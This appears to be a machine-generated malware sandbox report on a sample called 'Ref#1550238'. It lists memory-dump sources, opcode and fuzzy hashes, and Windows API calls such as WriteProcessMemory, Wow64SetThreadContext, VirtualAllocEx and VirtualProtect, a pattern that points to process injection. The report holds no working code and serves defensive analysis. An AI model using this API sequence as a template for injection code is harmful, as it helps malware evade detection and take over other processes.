                                                                                    • Instruction ID: 804f03d5adc5c2bb41f0d69ddd5b2b8b297f05e3776f59850a5f06fd2ac30af5
                                                                                    • Opcode Fuzzy Hash: dcadb45b480f6e02be710a1f70567288006a3eb598660266d235e23a6b5ef7cb
                                                                                    • Instruction Fuzzy Hash: 8F519871D007198FDB50DFA9C9827AEBBF2BF49720F14852EE855E7280DB789845CB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 962 63b21a2-63b21f6 965 63b21f8-63b2204 962->965 966 63b2206-63b2245 WriteProcessMemory 962->966 965->966 968 63b224e-63b227e 966->968 969 63b2247-63b224d 966->969 969->968
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 063B2238
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 010431f782a8307d1808912207548e457e7f0c37310a8153dd88cabde4144f1c
                                                                                    • Instruction ID: 065c9df4a8c42f31932ef7fdb84a383c511372f870f9abc8251f3f1424e25743
                                                                                    • Opcode Fuzzy Hash: 010431f782a8307d1808912207548e457e7f0c37310a8153dd88cabde4144f1c
                                                                                    • Instruction Fuzzy Hash: B8215A7590034D9FDB10DFA9C881BEEBBF5FF88310F508429E958A7240C7789A45CBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 973 63b14f0-63b14f1 974 63b152d-63b1543 973->974 975 63b14f3-63b152b 973->975 977 63b1553-63b1583 Wow64SetThreadContext 974->977 978 63b1545-63b1551 974->978 975->974 980 63b158c-63b15bc 977->980 981 63b1585-63b158b 977->981 978->977 981->980
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 063B1576
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: f7d0896c1850b87add1bcd51b2a18480464747bcada46bc1a3b8a6aca964de06
                                                                                    • Instruction ID: eae2a530f9980fa43e441489eb86bc30225f9a12b1e4744d3efd7618992b1fa2
                                                                                    • Opcode Fuzzy Hash: f7d0896c1850b87add1bcd51b2a18480464747bcada46bc1a3b8a6aca964de06
                                                                                    • Instruction Fuzzy Hash: 3821A975C003099FDB10DFAAC8817EEBBF4EF89310F50842AD559A7640CB789A45CFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 986 63b21a8-63b21f6 988 63b21f8-63b2204 986->988 989 63b2206-63b2245 WriteProcessMemory 986->989 988->989 991 63b224e-63b227e 989->991 992 63b2247-63b224d 989->992 992->991
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 063B2238
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 88867111badf038402b63b20538a4c59ea64d8aa207879ab110ff5a9d73fded0
                                                                                    • Instruction ID: b371ea5592e773663dad447a1ce42aeaa83e29987d0e27ff62c51c5a6f94ca79
                                                                                    • Opcode Fuzzy Hash: 88867111badf038402b63b20538a4c59ea64d8aa207879ab110ff5a9d73fded0
                                                                                    • Instruction Fuzzy Hash: B421397590034D9FDB50DFAAC881BEEBBF5FF48310F508429E918A7240C7789A44DBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1005 a5bda0-a5dd3c DuplicateHandle 1007 a5dd45-a5dd62 1005->1007 1008 a5dd3e-a5dd44 1005->1008 1008->1007
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A5DC6E,?,?,?,?,?), ref: 00A5DD2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2508680920.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_a50000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: e344e3891395c280abc3e676934d83d1e5aa91cab8028df9ed728f23190052b0
                                                                                    • Instruction ID: 081fe908972fed7f7b64e0fee8d4823233f6045fd215e5df3e604d7d43835a0a
                                                                                    • Opcode Fuzzy Hash: e344e3891395c280abc3e676934d83d1e5aa91cab8028df9ed728f23190052b0
                                                                                    • Instruction Fuzzy Hash: 662116B5901349AFDB10CFAAD884ADEBBF8FB48311F10841AE914B7310D378A944CFA0
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 063B1576
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: bc800cbf492f7078752d00784c8a780efa88c6448b65d850f0ee4c7e7ebec386
                                                                                    • Instruction ID: c7376b33ac3c10943dd9ffbbfc1fd8e25a793dbb9c0f01d9ef4e620a079404e7
                                                                                    • Opcode Fuzzy Hash: bc800cbf492f7078752d00784c8a780efa88c6448b65d850f0ee4c7e7ebec386
                                                                                    • Instruction Fuzzy Hash: 95214771D003098FDB10DFAAC4857EEBBF4EF88320F54842AD559A7240CB789A44CFA4
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06B8DB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: f54f06cb956431fd5a0cf36e3858e8b94e4f0640579f98b17a76ab359c0dadc1
                                                                                    • Instruction ID: e2288c421c668bd5b4c50cf206f51dbdb05e641386afdd4a8091dc3290ebd2e2
                                                                                    • Opcode Fuzzy Hash: f54f06cb956431fd5a0cf36e3858e8b94e4f0640579f98b17a76ab359c0dadc1
                                                                                    • Instruction Fuzzy Hash: 9E210971C003099FDB14DFAAC441BAEBBF5EF48610F548429E559A7240CB799544DFA1
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06B8DB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 29baa84e30c38634e779c22955afc3bc6a1c8394737b277d45e187047fed31c4
                                                                                    • Instruction ID: 61a089c37f9383579a9b82ca24358838aebbf0c4771bc3a179a2eb67cca911d8
                                                                                    • Opcode Fuzzy Hash: 29baa84e30c38634e779c22955afc3bc6a1c8394737b277d45e187047fed31c4
                                                                                    • Instruction Fuzzy Hash: 082115B18003099FDB10DFAAC841BAEBBF5EF88620F54842AD559A7240CB799944DFA0
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063B1F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 575426fd18832a15a1e22d5db1bcb4e7071e1d7e915e6a2b94fff6863441479f
                                                                                    • Instruction ID: 8efc4caa69b76533d4493777faecf758ace036aef3cb012c4bb91aa5e675ffa2
                                                                                    • Opcode Fuzzy Hash: 575426fd18832a15a1e22d5db1bcb4e7071e1d7e915e6a2b94fff6863441479f
                                                                                    • Instruction Fuzzy Hash: 461159758003499FDB20DFAAC844BEEBFF5EF88710F148819E559A7250CB759940CFA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: a1da3098571b59bf0e9f67cf315dda4cd24c24e095ee1c7c94c5a021ac13e951
                                                                                    • Instruction ID: a3f1e1127afded51bd605f926f7e190a7be9c0dbec4da84cf6ede4af1e31e9f5
                                                                                    • Opcode Fuzzy Hash: a1da3098571b59bf0e9f67cf315dda4cd24c24e095ee1c7c94c5a021ac13e951
                                                                                    • Instruction Fuzzy Hash: D9113AB19003499FDB24DFAAC845BEFBFF9AB88610F14841AE455A7240CB799944CBA4
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C4D8EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528827060.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6c40000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: f410bfb7ca2dfecd395de9a35df7351a0da47454feec596f97cf55f075832898
                                                                                    • Instruction ID: e6c286f8c454229c3a2fa973d6d765c25730cbf7eb0c66ea436f561c00ed005b
                                                                                    • Opcode Fuzzy Hash: f410bfb7ca2dfecd395de9a35df7351a0da47454feec596f97cf55f075832898
                                                                                    • Instruction Fuzzy Hash: BB11F771D003499FDB10EFAAC844BAEFBF5EF48610F54841AD419A7240C775A944CFA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 8a095dbd32c2866410522345af4490a22cf1ffdb1336958ea534c88faf1cc302
                                                                                    • Instruction ID: 3b7aab5f788b8cf481dffa6bd2dd697422c3f1705e55fd40cacb2c74ac43f882
                                                                                    • Opcode Fuzzy Hash: 8a095dbd32c2866410522345af4490a22cf1ffdb1336958ea534c88faf1cc302
                                                                                    • Instruction Fuzzy Hash: 131149B19003498FDB10DFAAC8447EEFFF9AF88620F14841AD459A7240CB799944CBA4
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063B1F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1150b4d24190c37e98b7c3a7580e087097e2d74362b9b876c833895fc645bfa3
                                                                                    • Instruction ID: 9bbfc60d1eb8f0558907611a94ecaef6eb0a840681c18953d16ed49170a7724b
                                                                                    • Opcode Fuzzy Hash: 1150b4d24190c37e98b7c3a7580e087097e2d74362b9b876c833895fc645bfa3
                                                                                    • Instruction Fuzzy Hash: EB1146758003499FDB10DFAAC844BEFBBF5EF88720F148819E519A7250CB79A954DFA0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00A5B61E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2508680920.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_a50000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: c1ad2cf51032c2de453665e2a7d7a58a50535d238be56b79c5ce52c989010312
                                                                                    • Instruction ID: 21216ee1510c5a9312a7c752cb656d16728cd3f9182b761e2dfcf159e6999aee
                                                                                    • Opcode Fuzzy Hash: c1ad2cf51032c2de453665e2a7d7a58a50535d238be56b79c5ce52c989010312
                                                                                    • Instruction Fuzzy Hash: 651110B5C003498FDB10DF9AD444BDEFBF4BB88321F10841AD819A7600C379A545CFA1
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06C4E8CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528827060.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6c40000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 01cc18c2906f4cc33d4f89d6a26f3cfb28f2a297e357314dec917994bbced39b
                                                                                    • Instruction ID: 3a928a3d6b3930176bdfcc6d82e7b1c1b24c7d248c5493e3cd7d7166a678e3e1
                                                                                    • Opcode Fuzzy Hash: 01cc18c2906f4cc33d4f89d6a26f3cfb28f2a297e357314dec917994bbced39b
                                                                                    • Instruction Fuzzy Hash: 311137718003499FDB10DFAAC844BDEBBF5BF88720F14881AE519A7240C7759544DFA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XM[
                                                                                    • API String ID: 0-4036937546
                                                                                    • Opcode ID: fd8acb453d350b233c6050f84b066d5289cfd2ff45e9e42fd94eb8f9c2801089
                                                                                    • Instruction ID: 60202a11f90f19efcad4bf41b2eba7f6dc9948c15547750e0988f0ceac1b9ff9
                                                                                    • Opcode Fuzzy Hash: fd8acb453d350b233c6050f84b066d5289cfd2ff45e9e42fd94eb8f9c2801089
                                                                                    • Instruction Fuzzy Hash: 5711A574A41128CFDBA5DF24D894BD9BBF1BF49340F4041EAE50AA7350DA319E80CF40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C
                                                                                    • API String ID: 0-1037565863
                                                                                    • Opcode ID: 9550b1e12ec15dbd77d619972796ded56a3e272dabf4ce43bd60b10ab45806c2
                                                                                    • Instruction ID: 53b59bd0371e8c0451391bae8abd4e6449efb8921cc0c54792d750e56b65307a
                                                                                    • Opcode Fuzzy Hash: 9550b1e12ec15dbd77d619972796ded56a3e272dabf4ce43bd60b10ab45806c2
                                                                                    • Instruction Fuzzy Hash: C601BD70D15369DFEBA1EFA4D944B9DBBB2BF46304F0055EAE809A2280C7754E80CF06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Q
                                                                                    • API String ID: 0-3463352047
                                                                                    • Opcode ID: 9675fb17e6b27d10ce247591f7b3484577dceb9cd06a33a3f8692c5096390262
                                                                                    • Instruction ID: 88dcf57a78aa009a458903ac87f9fe94306988c6669241f23ef88030a2766f95
                                                                                    • Opcode Fuzzy Hash: 9675fb17e6b27d10ce247591f7b3484577dceb9cd06a33a3f8692c5096390262
                                                                                    • Instruction Fuzzy Hash: 9FF06D78E653A9CFEBA0EF25D84878D7BB1BB45301F0144D6E489A7284CB784D818F45
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: i
                                                                                    • API String ID: 0-3865851505
                                                                                    • Opcode ID: 6b0e1e7de74f8498cbc997c056992af993e48ea97761308fc9f29918209a2183
                                                                                    • Instruction ID: 8209c5fe89e73a9c145ffa92a3187e7c281fd954099111eeb015ffef1b15b542
                                                                                    • Opcode Fuzzy Hash: 6b0e1e7de74f8498cbc997c056992af993e48ea97761308fc9f29918209a2183
                                                                                    • Instruction Fuzzy Hash: 5BF0F974E14368CFEB65DF25D884B9ABBB5BB46305F0180D6E489A2284D7780F84CF42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2529084026.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ea0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: f
                                                                                    • API String ID: 0-1993550816
                                                                                    • Opcode ID: c0fee12633499a3dfd7043eed050170f260946fdc483b631b687b8e986790e20
                                                                                    • Instruction ID: 9f5e8ea4947d5a056ebf2530a03593466633729e2be17af5234b8967baa82847
                                                                                    • Opcode Fuzzy Hash: c0fee12633499a3dfd7043eed050170f260946fdc483b631b687b8e986790e20
                                                                                    • Instruction Fuzzy Hash: 09F0E230A043448FE756DF25D8887EA7771FF85308F4050D8E04A5B281DB742E44CF50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Q
                                                                                    • API String ID: 0-3463352047
                                                                                    • Opcode ID: 4ca17c05a3aae209cd38098cb639a6c9970dd43c2dcfe58c7dc333787014e4f9
                                                                                    • Instruction ID: b4de161bc0cfb96db13d2b79ccb64e0fcdfb371d542de8888b34b21bc96882ee
                                                                                    • Opcode Fuzzy Hash: 4ca17c05a3aae209cd38098cb639a6c9970dd43c2dcfe58c7dc333787014e4f9
                                                                                    • Instruction Fuzzy Hash: AFF09A74E60379CFEBA0EF25D84878DB7B1BB44301F0044DAE449A7244CB784D808F85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Q
                                                                                    • API String ID: 0-3463352047
                                                                                    • Opcode ID: bfe988f215a9926d8def8c6aea5f8f4081f0d53b679c326610d4d86766802394
                                                                                    • Instruction ID: b4de161bc0cfb96db13d2b79ccb64e0fcdfb371d542de8888b34b21bc96882ee
                                                                                    • Opcode Fuzzy Hash: bfe988f215a9926d8def8c6aea5f8f4081f0d53b679c326610d4d86766802394
                                                                                    • Instruction Fuzzy Hash: AFF09A74E60379CFEBA0EF25D84878DB7B1BB44301F0044DAE449A7244CB784D808F85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: i
                                                                                    • API String ID: 0-3865851505
                                                                                    • Opcode ID: f2ccc6fa784c0962111a34767bd2c4afb4b194545ffa09bcfb8a52ea44db2cfd
                                                                                    • Instruction ID: 4d1de9eeff82d710b87ec386abd27754854088f80e4d3a286d6b3d2e13cf62af
                                                                                    • Opcode Fuzzy Hash: f2ccc6fa784c0962111a34767bd2c4afb4b194545ffa09bcfb8a52ea44db2cfd
                                                                                    • Instruction Fuzzy Hash: C9F0FE74E14368CFDB65DF25D884799BBF5BB46345F0184D6E489A2244D7344F80CF41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w
                                                                                    • API String ID: 0-476252946
                                                                                    • Opcode ID: 4c7c3b3fb83ae8adb03c08d2dc23f5b24c92e667a35e85d055743a003eecdf50
                                                                                    • Instruction ID: 43071a35abc96ae493b090740c52dddcdf98d5f0845f11d4396bb57bc4ace067
                                                                                    • Opcode Fuzzy Hash: 4c7c3b3fb83ae8adb03c08d2dc23f5b24c92e667a35e85d055743a003eecdf50
                                                                                    • Instruction Fuzzy Hash: 6FF05FB4D18228CFDBA0CF25C98569CBBF4BB48244F5044DAE64DA3251DF301E848F08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d84351df61076c9e0f5738cea2f397f237c9fff4fb9e665be1da34065d37fe2
                                                                                    • Instruction ID: 840c3907d4b960bbad21a815ec00dae1d04f8053ba3436d6e5721ac08f11b009
                                                                                    • Opcode Fuzzy Hash: 4d84351df61076c9e0f5738cea2f397f237c9fff4fb9e665be1da34065d37fe2
                                                                                    • Instruction Fuzzy Hash: 60520B75A002288FDB64DF69C955BEDBBF2BF88300F1581D9E509AB351DA309E81CF61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528025954.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_69f0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6263cfb647b8df56b28ea87968ce789207e8cf21dec5373ef230cd8c56bd4371
                                                                                    • Instruction ID: 6a5697c9c359247d78356d64ced0a1143c0edc2a2a0ca7e206363447c3429f22
                                                                                    • Opcode Fuzzy Hash: 6263cfb647b8df56b28ea87968ce789207e8cf21dec5373ef230cd8c56bd4371
                                                                                    • Instruction Fuzzy Hash: 3A422874E20209CFDB54DBE4C498BAEBBB2FB88341F518419DA52A7654C7749E82CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f3d8c3a6a55dd668c7ce75f554b827b1f980544ad0c7bbff142708576ebd7a8
                                                                                    • Instruction ID: f7010b0a3f137ea40e8db4d680387a012d6630bd7f617259eeeed3c7752a40e1
                                                                                    • Opcode Fuzzy Hash: 8f3d8c3a6a55dd668c7ce75f554b827b1f980544ad0c7bbff142708576ebd7a8
                                                                                    • Instruction Fuzzy Hash: A4229B71A40225DFDB44EFA9C594AADB7F2FF88300F158059E906AB3A5CB75ED40CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aac3d9e25ca8d93ff33c48d8bcc435c70a50db2c63964935ab86d7f78eca4e5e
                                                                                    • Instruction ID: 680e02024cde372b50c888a28e04c7c5ee492a6433b2b59143190d5b51b4006e
                                                                                    • Opcode Fuzzy Hash: aac3d9e25ca8d93ff33c48d8bcc435c70a50db2c63964935ab86d7f78eca4e5e
                                                                                    • Instruction Fuzzy Hash: 20227E71E4022ACFCB55EFA8D844AADBBB2FF88300F144015E911AB399DB75DE41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2ecc3f702582803db4da3faa3d2a4809235f7e10280f55a6b86fa0e74aa960d3
                                                                                    • Instruction ID: 7ccfb71c3b59654739098387ea7665fdb62b6c643ff775772d84332a3adedd70
                                                                                    • Opcode Fuzzy Hash: 2ecc3f702582803db4da3faa3d2a4809235f7e10280f55a6b86fa0e74aa960d3
                                                                                    • Instruction Fuzzy Hash: 31127B71A002158FCB65EFA9C984A6EB7F2FF88300F11852DE5069B355DB31EC46CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d85c609346eb2af7ffa41872cb3f6b639a5de5036380d115548f29a7412ffedb
                                                                                    • Instruction ID: 49778116facf646dd5bb4d3ae384425bde1b55a46a224bf85e0f870473e51b20
                                                                                    • Opcode Fuzzy Hash: d85c609346eb2af7ffa41872cb3f6b639a5de5036380d115548f29a7412ffedb
                                                                                    • Instruction Fuzzy Hash: 37F1EA74A40219DFCB44EFA8D994E9DB7B2FF89310F118168E506AB365DB71EC42CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528025954.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_69f0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
